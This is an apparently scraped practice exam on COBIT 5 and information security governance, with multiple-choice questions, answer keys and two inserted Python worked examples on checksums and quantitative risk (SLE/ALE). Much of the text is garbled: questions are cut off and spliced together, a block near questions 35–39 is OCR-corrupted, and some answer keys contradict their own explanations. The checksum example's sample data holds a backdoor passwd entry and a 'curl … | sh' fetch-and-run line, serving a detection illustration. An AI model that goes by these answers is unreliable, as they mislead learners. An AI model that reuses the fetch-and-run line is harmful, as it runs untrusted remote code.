Simulado COBIT 5 (COBIT 5 practice exam)


  • 8/16/2019 simlado cobit 5

    1/33

1. Which one of the following is a good example of an information security strategy?

A. Changing passwords regularly.
B. Balancing administrative versus technological controls.
C. Prohibiting the use of dial-up modems on laptops linked to the corporate network.
D. Doing background checks on all applicants for security positions.

B is an example of strategy. None of the other choices is of a strategic nature, although they are examples of good practice. Answer: B

2. An enterprise that publishes information on the Internet must have, as a minimum, which one of the following items in place?

A. Data policy.
B. Security policy.
C. Privacy policy.
D. Communications policy.

Information published on the Internet should be protected by a privacy policy linked to each page. Each page should provide a notice linking to that privacy policy and allowing 'opt in' and/or 'opt out' options; documents published on the Web need expiration dates and a process to remove them; consent must be obtained from the authors of any published material, and if copying or reuse is prevented, that should be made clear. Answer: C

3. Which one of the following would be a strategic objective for information security?

A. Improved incident response capability.
B. Enterprise baseline security established.
C. Executive involvement in the security awareness programme.
D. Increased organizational capability.

Translating benefits achieved into an increased organizational capability that enables future business is a strategic objective. The other options are all operational activities. Answer: D

4. If server downtime is a performance measure appropriate to IT management, which one of the following is a likely performance measure that senior/executive business management would typically focus on?

A. Impact on revenue.
B. Cost of eBusiness application.
C. Ping response.
D. Cost per eBusiness transaction.

Senior/executive management are only interested in measurements that show the impact on mission-critical areas. Answer: A

5. The business need for asset protection is best expressed in terms of which one of the following attributes?

A. IT quality.
B. IT reliability.
C. IT integrity.
D. IT compliance.

A. quality = performance standard; B. reliability = fiduciary control; C. integrity = asset protection; D. compliance = fiduciary control. Therefore, information security is focused on asset protection. Answer: C

6. Which one of the following documents should be submitted when seeking senior management commitment for the information security program?

A. Risk assessment report.
B. Detailed list of tasks.
C. Security technology brochures.
D. Budget of known costs of security.

D is correct because cost is always an important issue for decision makers. Senior management are typically not interested in the detailed tasks, the inventory of risks or how the technology works; these activities are usually delegated. Matters of cost, however, are rarely delegated. Answer: D

7. Which one of the following would be one of the best strategies in making a security policy effective?

A. Include users in the process of developing a security policy.
B. Calculate the cost of too little security and any inconvenience.
C. Detail the punishments for failing to comply.
D. Make the buy-in from a senior manager highly visible.

Visible actions of senior management supporting the security policy will demonstrate their clear commitment and will have the most impact in achieving the desired effectiveness. The other options, whilst useful, will not be as effective. Answer: D

8. Security management would typically report the achievements of information security initiatives in supporting the business strategy by using which one of the following measurements?

A. Time lag between detection, reporting and acting upon security incidents.
B. Reduced number of security-related service calls, change requests and fixes.
C. Customer satisfaction.
D. Number of incidents causing public embarrassment.

CobiT Management Guideline: senior/executive management are only interested in measurements that show the impact on mission-critical areas. Customer satisfaction is the most important issue listed. Answer: C

9. Awareness about information security activities is enhanced when set out clearly in which one of the following documents?

A. [option text missing from the source]
B. Security standards.
C. Job descriptions.
D. Training manual.

C is correct because job descriptions that set out roles and responsibilities indicate the significance of security to the employee: something for which they are specifically accountable. Setting out security matters in the roles and responsibilities of staff has little to do with standards, so B is inappropriate. A may be a by-product, but would not be the objective. D is a possibility, but not as effective as job descriptions. Answer: C


10. Which one of the following is essential in securing senior management commitment and support of information security management?

A. Basing information security discussions around a plan of action.
B. Using a technical specialist to explain security properly.
C. Presenting evidence of the threats of a security breach.
D. Explaining in clear detail what needs to be done, rather than why.

A is correct, as senior management expect answers to any problems presented, or at least a plan to address the problem. They do not normally want to speak to specialists, nor do they appreciate hype. D is not correct, as senior management are more interested in WHY something must be done than in WHAT needs to be done. Answer: A

11. The most successful action for integrating information security governance into the overall enterprise governance framework is likely to be which one of the following?

A. Sending information security personnel on corporate governance training.
B. Establishing an audit committee that clearly understands its role.
C. Appointing a business manager as head of information security.
D. Combining the internal audit function with security management.

A is a possible correct answer, but in comparison to B it is inferior. D is inappropriate, and whilst C is not inappropriate it will not address the issues of better governance. B, establishing an audit committee that understands its role, is the best answer. Answer: B

12. How can the balanced scorecard technique be used for risk management?

A. Mapping IT risks to key goal indicators.
B. Relating performance indicators to outcomes.
C. Stating process outcomes as risk drivers.
D. Restating key goal indicators as risk indicators.

The balanced scorecard, as a technique, focuses on objectives and related measures. If key goal indicators have been defined to meet business objectives, then they can be restated in terms of the associated risks should the business objectives not be met. Answer: D

13. Which one of the following is a popular method of integrating information security governance into the overall enterprise governance framework?

A. Security awareness campaigns.
B. Benchmarking.
C. Centralized security administration.
D. Enterprise risk management.

Effective security is not just a technology problem; it is a business issue. Enterprise risk management will address many issues, including the corporate culture, management's security consciousness and security-related actions. Enterprise risk management will ensure that information security, where significant, is part of the overall governance framework. Answer: D

14. Which one of the following information criteria would be important to address enterprise executives' and directors' fiduciary responsibilities for security management?

A. Reliability.
B. Effectiveness.
C. Availability.
D. Integrity.

A. reliability = fiduciary control; B. effectiveness = performance; C. availability = security; D. integrity = security. Reliability relates to providing management with appropriate information for it to use in operating the entity, providing financial reporting information, and providing information to report to regulatory bodies with regard to compliance with laws and regulations. Answer: A

15. High-level security policies are created for which one of the following reasons?

A. Administrative.
B.


[...] considered so that the system can function as intended. The project budget is not their concern. The design documentation will be reviewed by a security technical expert. Cost justification of the system design would not be the responsibility of the security steering committee. Answer: B

19. Which one of the following roles would be acceptable for the Security Administrator to perform, in addition to their normal function?

A. Database Administrator.
B. Systems Analyst.
C. Computer


A is correct. There would be less of an enterprise view of security arrangements. But this should not result in a lower level of awareness, lack of significance or direction, as in a devolved situation employees should be supported through training and therefore be able to fine-tune security to match precise needs. Answer: A

27. Which one of the following is a disadvantage of a devolved IT security arrangement, with all employees being responsible for security as an integral part of their activities?

A. Security becomes subservient to other activities.
B. Higher managerial effort.
C. Lower personal motivation.
D. Excessive bureaucracy.

The disadvantage of devolution is an increase in managerial effort to maintain control. Security will be an integral part, and therefore not a subservient activity. Staff will be more motivated, not less, and excessive bureaucracy will be removed. Answer: B

28. When securing personally identifiable information, which one of the following is a reasonable basis to determine the level of protection required?

A. Sensitivity of the information.
B. Source of the information.
C. Cost to obtain the information.
D. Validity of the information.

A is the correct answer because the sensitive nature of the information takes precedence over its source, cost or validity. Answer: A

29. Where an organization is collecting personally identifiable information, it should be able to explain which one of the following to the individual?

A. The nature of its business in relation to its customers.
B. The purpose for which the information is being collected.
C. The enterprise business plan.
D. The business continuity planning arrangements.

Personally identifiable data should only be collected from individuals where the organization can explain its purpose for doing so. The other options are not relevant. Answer: B

30. Privacy cannot be protected without adequate network security programs, good encryption, identification programs and which one of the following?

A. User manuals.
B. Document management programs.
C. Arbitration schemes.
D. Retention of staff.

The management of business records is a critical component in ensuring privacy. Answer: B

31. The information security manager would consider insurance as a tool for which one of the following objectives?

A. Protection of property.
B. Preservation of critical information.
C. Defect management.
D. Revenue growth.

Insurance has little to do with revenue or defect management. Whilst protection of property is secured through insurance, this is very much part of the normal insurance arrangements of a company. Preservation of critical information is a core area of responsibility for information security, and insurance is therefore a tool to be used to counter threats to it. Answer: B

32. Which one of the following activities is likely to result in reduced insurance premiums?

A. Quality assurance.
B. Recruitment practices.
C. Enterprise architecture.
D. Classification of information.

Some insurance providers offer lower premiums if the organisation meets various criteria, which include the classification of information, network security and business continuity planning. The other options have no relevance to insurance contracts. Answer: D

33. Which one of the following can be used to identify enterprise record-keeping requirements?

A. Database management system.
B. Risk assessment.
C. Security policy.
D. System specifications.

Explanation: none given in the source. Answer: B

34. With whom should responsibility and accountability for record management rest?

A. Executive management.
B. A person with authority.
C. Process owners.
D. Data administration.

Specific leadership responsibility and accountability for records management should be assigned to a person with appropriate authority within the organization. Executives are responsible for supporting the application of records management policies throughout the organization. Answer: B

35. Which one of the following is most likely to influence decisions about the development and implementation of a particular business document classification tool or technique?

A. The complexity of the business activities.
B. The way business activities are performed.
C. The external threats to the enterprise.
D. The level of support given to users.

The level of support given to users will influence decisions about the development and implementation of particular classification tools. The complexity of the business activities, and the way business activities are performed, will influence the type of classification tool most suited to an organisation. C is not relevant. Answer: D

36. What is the primary driver for record retention?

A. Compliance with legislation.
B. A durable historical record.
C. Information security.
D. Data protection.

Good records are vital corporate assets, and good record keeping is essential for a reliable and durable long-term historical record. Each of the other options has an impact, but the primary driver is maintaining a historical record of business activity. Answer: B

37. Which one of the following should not be included in an information security policy?

A. Senior management expectations.
B. Prescriptive information.
C. Statements of direction.
D. Clarity on accountability.

The security policy should set out senior management requirements without detailing how they should be achieved; business management should be allowed the choice of mechanism. Answer: D (as given in the source key; note that the explanation argues that prescriptive detail, option B, is what does not belong in a policy)

38. Which one of the following is an effective way of tying security policy to business objectives?

A. Information classification.
B. Systems master plan.
C. Information engineering.
D. Enterprise architecture.

Information classification will enable security policies to be applied according to business priorities. The systems master plan is used to map application system development to business requirements. Information engineering is used to model information requirements across the enterprise to the information systems architecture. An enterprise architecture is a repository of information about the organisation, its information, business processes, application systems and supporting infrastructure, useful for decision making. Answer: A

39. A security architecture presupposes the existence of which one of the following?

A.


44. A process model such as CobiT has been developed based on experience that has shown the maturity level of an organization to be an indicator of which one of the following?

A. Past performance.
B. Current performance.
C. Future performance.
D. Minimum performance.

The maturity level of an organization provides a way to predict the future performance of an organization within a given discipline or set of disciplines. Empirical studies of the Software Engineering Institute support this. The other choices are not feasible. Answer: C

45. When focused on process improvement, organizations do their best in which one of the following instances?

A. Align their efforts with their current process area capabilities.
B. Focus on maximizing process area sophistication rapidly.
C. Focus their efforts on a manageable number of process areas.
D. Plan the increased sophistication around current demands.

Experience has shown that organizations do their best when they focus their process improvement efforts on a manageable number of process areas that require increasingly sophisticated effort as the organization improves. Answer: C

46. If the assessment of risk is a standard procedure and exceptions to following the procedure would be noticed by IT management, the process capability is likely to be assessed according to the CobiT model at which one of the following levels?

A. Defined Process.
B. Initial/Ad hoc.
C. Managed and Measurable.
D. Repeatable but intuitive.

At Level 4 (Managed and Measurable) control is established using statistical and other quantitative techniques, and therefore exceptions will be easily detected. (For reference, the CobiT maturity scale used throughout these questions is: 0 Non-existent, 1 Initial/Ad hoc, 2 Repeatable but intuitive, 3 Defined process, 4 Managed and measurable, 5 Optimised.) Answer: C

47. Which of the CobiT processes listed below is most directly related to the management of information security?

A. Manage quality.
B. Define the organizational relationships.
C. Assess risks.
D. Assess internal control adequacy.

Information security is a response to managing risks, and therefore C is the correct answer. A and B are clearly incorrect, whilst D is indirectly relevant to security. Answer: C

48. What is the basic premise of CobiT when it comes to achieving enterprise needs?

A. Process capability is required in 34 processes.
B. Key performance indicators must balance key goal indicators.
C. Key goal indicators must balance four key perspectives of the enterprise.
D. IT needs to deliver the information that the enterprise needs.

At the core of CobiT is the understanding that IT delivers value to the business through the information it produces. Information that is late or unreliable has little value. Answer: D

49. If an organization considers IT risks in an ad hoc manner, without following defined processes or policies, it will be assessed at which level of process maturity?

A. Maturity level 1.
B. Maturity level 2.
C. Maturity level 3.
D. Maturity level 4.

Maturity level 1 is an environment where activities are conducted in an ad hoc, chaotic manner. Maturity level 1 organizations often produce products and services that work, but only because of the efforts of the individuals employed. Answer: A

50. If responsibilities for continuous service are informal, with limited authority, and management is only now becoming aware of the risks related to, and the need for, continuous service, then the process capability will be assessed at which one of the following levels?

A. Defined Process.
B. Initial/Ad hoc.
C. Managed and Measurable.
D. Repeatable but intuitive.

According to the IT Security Governance Maturity Model, at level 2 responsibilities and accountabilities for IT security are assigned to an IT security coordinator with no management authority. At level 1 responsibilities for continuous service are informal, with limited authority, and management is becoming aware of the risks related to, and the need for, continuous service. Answer: B

51. At which maturity level would processes be well characterized and understood, and described in standards, procedures, tools and methods?

A. Maturity Level 1.
B. Maturity Level 2.
C. Maturity Level 3.
D. Maturity Level 4.

At maturity level 3, processes are well characterized and understood, and are described in standards, procedures, tools and methods. Standards are the first level above having properly defined procedures, which is maturity level 2. Answer: C

52. At which process maturity level would the process disciplines help ensure that existing practices are retained during times of stress?

A. Maturity Level 1.
B. Maturity Level 2.
C. Maturity Level 3.
D. Maturity Level 4.

The process discipline reflected by maturity level 2 helps to ensure that existing practices are retained during times of stress. When these practices are in place, projects are performed and managed according to their documented plans. Answer: B


53. At which level of maturity would an organization have a set of standard processes for security awareness briefings that have been established and improved over time, so that these standard processes can be used to establish consistency across the organization?

A. Maturity Level 1.
B. Maturity Level 2.
C. Maturity Level 3.
D. Maturity Level 4.

The organization's set of standard processes, which is the basis for maturity level 3, is established and improved over time. These standard processes are used to establish consistency across the organization. Projects establish their defined processes by tailoring the organization's set of standard processes according to tailoring guidelines. Answer: C

54. Which one of the following statements about the information security architecture is least likely to be correct?

A. It contains the detailed specifications, procedures, guidelines, standards and job descriptions for security management.
B. It describes the form, appearance, function and location of information security processes.
C. It provides a common basis for the design, development, implementation and management of the information security process.
D. It provides the basis on which the enterprise technology architecture will be selected and implemented.

The information security architecture is a high-level document that describes the form of security processes, provides a common basis for design, and is used to select technology; it does not carry the detailed specifications and job descriptions. Answer: A

55. At which level of process capability would high-availability components and system redundancy be applied, albeit piecemeal?

A. Defined Process.
B. Initial/Ad hoc.
C. Managed and Measurable.
D. Repeatable but intuitive.

According to the IT Security Governance Maturity Model, at level 2 reporting on system availability is incomplete and does not take business impact into account. At level 3 (Defined Process) high-availability components and system redundancy are being applied piecemeal. Answer: A

56. At which level of the IT Security Governance maturity model are user identification, authentication and authorization standardized across the enterprise?

A. Defined Process.
B. Initial/Ad hoc.
C. Managed and Measurable.
D. Repeatable but intuitive.

According to the IT Security Governance Maturity Model, at level 4 (Managed and Measurable) user identification, authentication and authorization are standardized enterprise-wide. Answer: C

57. ISO 17799 is intended to serve as a single reference point for identifying the range of controls needed by business. What size of enterprise is ISO 17799 specifically targeted at?

A. Small.
B. Medium.
C. Large.
D. All.

ISO 17799 (based on part one of BS 7799) is intended to serve as a single reference point for identifying the range of controls needed for most situations where information systems are used in industry and commerce. It is suitable for use by an organization of any size. Answer: D

58. The 'balanced scorecard' technique can be used by security management for which one of the following purposes?

A. Strategic alignment.
B. Risk assessment.
C. Internal control design.
D. Process capability improvement.

The balanced scorecard technique is used to align activities with strategic objectives. Within security management the balanced scorecard is used for strategic alignment with business goals. Answer: A

59. A business that is planning to use the Web to improve and/or integrate core business processes internally would typically require which one of the following sets of security measures?

A. Basic firewall, anti-virus and e-mail password protection; privacy policy; Web notification of privacy policy.
B. Demilitarized zone; identification, authentication and authorization at the Web and application levels; intrusion detection; transaction encryption; basic administration; privacy notice containing procedures for data handling.
C. Well-defined policies; centralized identification, authentication, authorization and management for all systems, data and applications; data encryption; privacy 'contracts'.
D. Integration of administration; identification, authorization and authentication schemes for data and applications; cross-enterprise trust; privacy 'contracts'.

Security requirements need to include centralized authentication and authorization for all systems and applications. Currently available security management products allow centralized, controlled access to applications based on security and privacy policies that define user and group job functions (or roles), and systems that centrally monitor security events across the enterprise so that suspicious activities can be more readily identified and appropriate action taken. Standardization of security system products, interfaces and protocols is important for application integration. Answer: C

60. ISO 17799 is best described by which one of the following statements?

A. A collection of baseline information security procedures.
B. A starting point for developing organisation-specific guidance.
C. A comprehensive set of security measures and controls to follow.
D. A standard that is only applicable to large enterprises.

ISO 17799 is a starting point for developing organisation-specific guidance. Not all the guidance and controls in the code of practice may be applicable, and other controls, not included, may be necessary. It is applicable to enterprises both large and small. It is not a baseline, nor is it comprehensive. Answer: B


1. Which enterprise business processes should the information security manager understand?

A. All processes.
B. Internal processes.
C. External processes.
D. Critical processes.

The information security manager should understand those business processes, and the information resources, that are critical to each business process. This will ensure that the implemented security matches the business requirement. Answer: D

2. In assessing risks, it is most important for the information security manager to commence with an analysis of which one of the following?

A. Project objectives.
B. Control objectives.
C. Business objectives.
D. Quality objectives.

There is a direct relationship between business objectives, which are what an entity strives to achieve, and the enterprise risk management components. Effective enterprise risk management helps management achieve business objectives. But enterprise risk management, no matter how well designed and operated, does not ensure an entity's success. Answer: C

3. A continuous approach to risk management will be focused on which one of the following?

A. Events and impacts.
B. Metrics and monitoring.
C. Response and controls.
D.


[...] rise to a threat. Answer: A

11. The most appropriate criterion for an information classification exercise is which one of the following?

A.


C. If threats are unknown, they can be quantified.
D. If the risks are inherent, they can be mitigated.

A is correct, because normally one responds to a situation of weak controls by improving their strength. It is not always easy to change the impact directly, nor is it easy to quantify threats. Inherent risks cannot be mitigated; they are part of doing business. Answer: A

21. How would a security manager best determine if the baselines for security are acceptable at their individual organization?

A. Perform a risk assessment.
B. Discuss with the vendors.
C. Examine industry best practice.
D. Review past audit reports.

A risk assessment will enable the security manager to determine whether or not security processes and procedures above the baseline are necessary. Answer: A

22. Which one of the following is an example of a detective control?

A. Message authentication.
B. Power supply protection.
C. Terminal time-out.
D. Checksum.

D is the only detective control. Message authentication is a preventive control, terminal time-out is a security (access) control, and power supply protection is a physical protection mechanism to ensure availability. Answer: D
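Worked example of the distinction in question 22, added here; it is not code from the original practice exam. A checksum is detective: a baseline of SHA-256 digests is taken over a constructed set of file contents, and a later comparison reports what was modified, added or removed without preventing any of it. The keyed variant (HMAC) shows why a plain checksum stays detective: anyone who can alter the data can also recompute a plain digest, whereas recomputing an HMAC needs the key, which is what makes it message authentication, the preventive control in option A. The file paths, contents and key below are constructed for the illustration.

```python
"""Checksum as a detective control, next to HMAC as a preventive one.

Added example; not part of the original practice exam. All file contents,
paths and the key are constructed sample data.
"""
import hashlib
import hmac

# Constructed snapshot of a few files at the time the baseline was taken.
BASELINE_FILES = {
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
    "/etc/ssh/sshd_config": b"PermitRootLogin no\nPasswordAuthentication no\n",
    "/usr/local/bin/backup.sh": b"#!/bin/sh\nrsync -a /data /backup\n",
}

# The same paths later: one file edited, one added, one removed (constructed).
CURRENT_FILES = {
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\nbackdoor:x:0:0::/:/bin/sh\n",
    "/etc/ssh/sshd_config": b"PermitRootLogin no\nPasswordAuthentication no\n",
    "/usr/local/bin/update.sh": b"#!/bin/sh\ncurl http://example.invalid | sh\n",
}


def checksum(data: bytes) -> str:
    """Plain SHA-256 digest: detects change, but anyone can recompute it."""
    return hashlib.sha256(data).hexdigest()


def build_baseline(files: dict) -> dict:
    """Record a digest per path; store this somewhere the monitored host cannot write."""
    return {path: checksum(content) for path, content in files.items()}


def detect_changes(baseline: dict, current: dict) -> dict:
    """Compare current digests with the baseline. Detection only: nothing is blocked."""
    current_sums = build_baseline(current)
    return {
        "modified": sorted(p for p in baseline
                           if p in current_sums and current_sums[p] != baseline[p]),
        "added": sorted(p for p in current_sums if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current_sums),
    }


def authenticated_checksum(data: bytes, key: bytes) -> str:
    """HMAC-SHA256: a keyed digest. Without the key, altered data cannot be
    given a valid tag, so verification rejects forgeries rather than merely
    noticing that something differs from a baseline."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_authenticated(data: bytes, key: bytes, tag: str) -> bool:
    """Constant-time comparison so the check itself does not leak the tag."""
    return hmac.compare_digest(authenticated_checksum(data, key), tag)


if __name__ == "__main__":
    report = detect_changes(build_baseline(BASELINE_FILES), CURRENT_FILES)
    for kind, paths in report.items():
        print(f"{kind}: {paths}")
    key = b"constructed-demo-key"
    tag = authenticated_checksum(BASELINE_FILES["/etc/passwd"], key)
    print("tampered passwd passes HMAC check:",
          verify_authenticated(CURRENT_FILES["/etc/passwd"], key, tag))
```

The practical consequence: a checksum baseline is only as trustworthy as the place it is stored. If the digests sit next to the files on the same host, an intruder who edits the file simply runs the same hash again; keeping the baseline off-host, or keying it, is what turns the control from "notices accidental change" into "notices hostile change".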

23. Which one of the following activities would occur first in a process to mitigate inherent risks to acceptable levels across the enterprise?

A. Impact assessment.
B. Develop a risk response.
C. Understand business objectives.
D. Event identification.

Whilst all are part of the enterprise risk management process, the order is objectives, events, impact, response. C is therefore correct. Answer: C

24. Proponents of qualitative risk analysis would argue which of the following points to be true?

A. Risk analysis is essential for determining countermeasures.
B. Risk analysis implies a precision that does not exist.
C. Risk analysis is the process to gather detailed metrics about security concerns.
D. Risk analysis implies a high level of precision is required.

Proponents of the qualitative approach hold that quantitative risk analysis is too subjective to be meaningful, and that it is not possible to make its calculations with any real precision; much of the input is 'guesstimates'. Answer: B

25. The risk assessment methodology needed to determine whether certain vulnerabilities are present will be affected by which one of the following?

A. The expected size of the vulnerability in relation to the entity.
B. The size of the entity and number of people employed.
C. The nature of the IT system and the phase of the SDLC it is in.
D. The number of weaknesses that can be exploited.

The existence of vulnerabilities will be most affected by the nature of the IT systems and/or the phase of the SDLC. The other options will not have an impact on the methodology used. Answer: C

26. When performing a risk analysis, the annual rate of occurrence is calculated from which one of the following?

A. Risks.
B. Vulnerabilities.
C. Threats.
D. Values.

The value of assets that can be lost (impact) is the basis for calculating the annual rate of occurrence. Answer: D (as given in the source key; note that in the standard quantitative model the annual rate of occurrence is an estimate of how often a threat materialises, while asset value and exposure factor give the single loss expectancy, and the two are multiplied to obtain the annualised loss expectancy)

27. A security concept of operations (strategy) is developed in which one of the following SDLC phases?

A. Initiation.
B. Development or Acquisition.
C. Implementation.
D.


D. Fewer tasks being needed for recovery.

A short recovery time objective requires specialized approaches to recovery, at a higher cost. Answer: A

31. Which one of the following is used to establish the vulnerability of an enterprise?

A. The value of the asset.
B. The absence of a safeguard.
C. The size of the risk.
D. The number of threats.

Vulnerability is related to a risk that can be countered; it is the absence of a safeguard that creates the vulnerability. Answer: B

32. Which one of the following is a typical method used to determine whether system vulnerabilities are present?

A. Staff surveys.
B. External vulnerability sources.
C. Vendor documentation.
D. Internal audits.

External sources that maintain databases of vulnerability information are the typical places to obtain information about vulnerabilities. Answer: B

33. Which one of the following is required before the potential losses incurred during the realization of a threat can be estimated?

A. Common asset valuation process.
B. Countermeasure design process.
C. Standardized vulnerability labels.
D. Threat ranking methodology.

Potential losses can only be determined if you have an idea of the asset values. Answer: A

34. Quantitative risk analysis is less likely to include which one of the following characteristics?

A. Cost/benefit analysis.
B. Financial hard costs.
C. Automated method.
D. Guesswork.

Quantitative analysis is intended to reduce the guesswork often found in risk analysis. Answer: D
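Worked example, added here and not part of the original practice exam, covering the quantitative model behind questions 24 to 26, 33 and 34: asset value and exposure factor give the single loss expectancy (SLE), the annual rate of occurrence (ARO) is a separate threat-frequency estimate, and their product is the annualised loss expectancy (ALE) that a cost/benefit comparison of a countermeasure needs. The asset, threat and cost figures, the scenario names and the function names are all constructed for the illustration.

```python
"""Quantitative risk analysis: SLE, ARO, ALE and countermeasure cost/benefit.

Added example; not from the original practice exam. Every figure below is a
constructed illustration, not a measured value.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Scenario:
    """One asset/threat pair with the three inputs the standard model needs."""
    name: str
    asset_value: float      # AV: what is at stake; needed before any loss can be estimated
    exposure_factor: float  # EF: fraction of AV lost per occurrence, 0.0 .. 1.0
    aro: float              # ARO: expected occurrences per year (a threat-frequency estimate)


def single_loss_expectancy(asset_value: float, exposure_factor: float) -> float:
    """SLE = AV x EF: the monetary loss from one occurrence of the threat."""
    if asset_value < 0:
        raise ValueError("asset value cannot be negative")
    if not 0.0 <= exposure_factor <= 1.0:
        raise ValueError("exposure factor must be between 0 and 1")
    return asset_value * exposure_factor


def annualized_loss_expectancy(sle: float, aro: float) -> float:
    """ALE = SLE x ARO: the expected loss per year from this threat."""
    if aro < 0:
        raise ValueError("annual rate of occurrence cannot be negative")
    return sle * aro


def scenario_ale(s: Scenario) -> float:
    return annualized_loss_expectancy(
        single_loss_expectancy(s.asset_value, s.exposure_factor), s.aro)


def countermeasure_value(ale_before: float, ale_after: float, annual_cost: float) -> float:
    """Net annual value of a control: (ALE before - ALE after) - annual cost.
    Positive: the control pays for itself. Negative: the asset is over-protected."""
    return (ale_before - ale_after) - annual_cost


def rank_by_ale(scenarios: list) -> list:
    """Order risks by expected annual loss, highest first (a prioritisation input)."""
    return [s.name for s in sorted(scenarios, key=scenario_ale, reverse=True)]


# Constructed sample: a customer database threatened by ransomware.
BASELINE = Scenario("customer DB / ransomware",
                    asset_value=2_000_000, exposure_factor=0.40, aro=0.50)
# Same asset after offline backups are added: EF drops because most data becomes
# recoverable, but ARO is unchanged; a backup does not alter how often the
# threat occurs, only how much is lost when it does.
WITH_BACKUPS = Scenario("customer DB / ransomware + offline backups",
                        2_000_000, 0.05, 0.50)
BACKUP_ANNUAL_COST = 120_000.0
# A second constructed risk, used only for the ranking.
DEFACEMENT = Scenario("public web server / defacement",
                      asset_value=300_000, exposure_factor=0.10, aro=4.0)


def evaluate() -> dict:
    before = scenario_ale(BASELINE)       # 2,000,000 x 0.40 x 0.5 = 400,000
    after = scenario_ale(WITH_BACKUPS)    # 2,000,000 x 0.05 x 0.5 = 50,000
    value = countermeasure_value(before, after, BACKUP_ANNUAL_COST)  # 350,000 - 120,000
    return {"ale_before": before, "ale_after": after,
            "net_value": value, "worthwhile": value > 0}


if __name__ == "__main__":
    for k, v in evaluate().items():
        print(f"{k}: {v}")
    print("priority order:", rank_by_ale([DEFACEMENT, BASELINE]))
```

Two things the numbers make visible that the prose does not: the control in the example changes the exposure factor and leaves the ARO alone, which is the separation between impact and frequency that question 26's explanation blurs; and a negative net value from countermeasure_value is the numerical form of "over-protected" in option B of question 39.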

35. Which one of the following would be the primary purpose of performing a gap analysis to assess generally accepted standards of good practice for information security management against the current state?

A. Benchmark against similar enterprises in the same and other industries.
B. Develop a set of action plans to recommend to management.
C. Establish a baseline for measuring progress in the future.
D. Institute a programme of continuous process improvement.

B and D are not correct, as a gap analysis alone would provide insufficient information for them. Whilst benchmarking would be of interest, the primary purpose of the gap analysis is simply to establish a point of reference for assessment again in the future. Answer: C

    -5 4 new Array=ICJ-50he current status of process capability is determined from which oneof the following?

    A. 7aturity scale.B. :ap analysis.C. Benefits analysis.". %is! assessment.

    An information security governance maturity model is scale for scoring thecurrent status of a process. :ap analysis is used to determine where you want tobe$ benefits analysis is used to prioriti/e the initiatives. A ris! analysis is a basepractice and not an indicator of process capability %1

    -6 -6Which one of the following would be used to determine processcapability targets?

    A. 7aturity scale.B. :ap analysis.C. Benefits analysis.". %is! assessment.

    An information security governance maturity model is scale for scoring thecurrent status of a process. :ap analysis is used to determine where you want tobe$ benefits analysis is used to prioriti/e the initiatives. A ris! analysis is a basepractice and not an indicator of process capability %&

    -9 -9Which one of the following would be used to priorities securityinitiatives?

    A. 7aturity scale.B. :ap analysis.C. Benefits analysis.". %is! assessment.

    An information security governance maturity model is scale for scoring thecurrent status of a process. :ap analysis is used to determine where you want tobe$ benefits analysis is used to prioriti/e the initiatives. A ris! analysis is a basepractice and not an indicator of process capability %-

    -; -;Which of the following is the biggest advantage of the ris! assessmentapproach over the baseline approach to information security

    management?

    A. At least some protection is available for all resources.B. 't ensures that the resources are not over protected.C. 't is an easier approach to implement.". 0he level of protection is matched to !nown threats.

    0he baseline approach ensures a particular level of control across theenvironment. sing a ris! assessment enables apriority to be established and themost li!ely targets are protected first and to a degree appropriate to the threat %&

40. Which choice below most accurately reflects the goals of risk mitigation?

A. Defining the acceptable level of risk the organization can tolerate, and reducing risk to that level.
B. Analyzing and removing all vulnerabilities and threats to security within the organization.
C. Determining all the threats to the business and transferring them to other organizations.
D. Analyzing the effects of a business disruption and preparing the company's response.

Risk mitigation is about reducing the inherent risk of being in business to acceptable levels that match the revenue generated R1

41. Which of the following is an error correction control relating to the raising of source documents?

A. A bank teller recording separately the total number of cheques deposited.
B. Pre-formatted deposit slips to be used by a bank customer.
C. Dual custody of details about the deposit.
D. Recording the depositor's personal details.

The depositor's personal details are relevant for error correction R4

42. Which one of the following is the appropriate document to describe risk mitigation strategies?

A. Risk analysis.
B. Information security policy.
C. Information security architecture.
D. Information classification scheme.

The information security architecture describes the enterprise-wide functionality of the security solutions to be deployed, i.e. the risk mitigation strategic choices. R3

43. The risk remaining after the implementation of new or enhanced controls is often described as which one of the following?

A. Mitigated risk.
B. Residual risk.
C. Transferred risk.
D. Control risk.

Inherent risk is a result of the business activities. Through appropriate countermeasures inherent risks are reduced, the result being the residual risk R2

44. A good risk mitigation strategy to start with against potential human threats when a vulnerability or flaw exists is which one of the following?

A. Decrease the likelihood of the vulnerability being exercised.
B. Minimize the risk of occurrence.
C. Decrease the attacker's motivation.
D. Reduce the potential for loss.

When a vulnerability (or flaw, weakness) exists: implement assurance techniques to reduce the likelihood of a vulnerability being exercised. When a vulnerability can be exercised: apply layered protections, architectural designs, and administrative controls to minimize the risk of or prevent this occurrence. When the attacker's cost is less than the potential gain: apply protections to decrease an attacker's motivation by increasing the attacker's cost (e.g., use of system controls such as limiting what a system user can access and do can significantly reduce an attacker's gain). When loss is too great: apply design principles, architectural designs, and technical and non-technical protections to limit the extent of the attack, thereby reducing the potential for loss R1

45. When selecting a risk mitigation solution the security manager will take which of the following into account?

A. A balance between the costs of the security solution and the risks to the resources.
B. A mix between security solutions to maximise effectiveness against the risks.
C. A combination of vendor opinion and security management preferences.
D. Preferred solutions identified in any of the past internal or external audit reports.

The security manager must balance the cost of the security technique against the risks to the information resources R1

46. Which one of the following should receive the greatest weighting when selecting a security solution?

A. Sensitivity analysis.
B. Cost/benefit analysis.
C. Risks to information resources.
D. Executive management directive.

Executive management determine the risk profile for the enterprise based on their perception of balancing risk and reward for the benefit of the stakeholders R4

47. Which of the following is the biggest actual threat to information systems?

A. Hackers.
B. Employees.
C. Industrial espionage.
D. Viruses.

Recent surveys continue to show that the real threat is from internal sources: employees, firstly as a result of errors R2

48. Which one of the following is an acceptable technique for assigning value to resources?

A. Technical complexity.
B. Executive management directive.
C. Level of control procedures.
D. A combination of the above.

In practice, security managers use a combination of these techniques R4

49. Which one of the following is the preferred approach for a security manager to adopt in determining that the level of security is appropriate?

A. Industry standard baselines.
B. Risk assessment.
C. Vendor recommendations.
D. Benchmarking.

A risk-based approach will ensure that specific threats to the enterprise are addressed, whilst the other approaches will address the general concerns R2

50. Which one of the following is the most significant benefit from setting baselines for security over an enterprise's information?

A. Accuracy.
B. Effectiveness.
C. Standardization.
D. Quality.

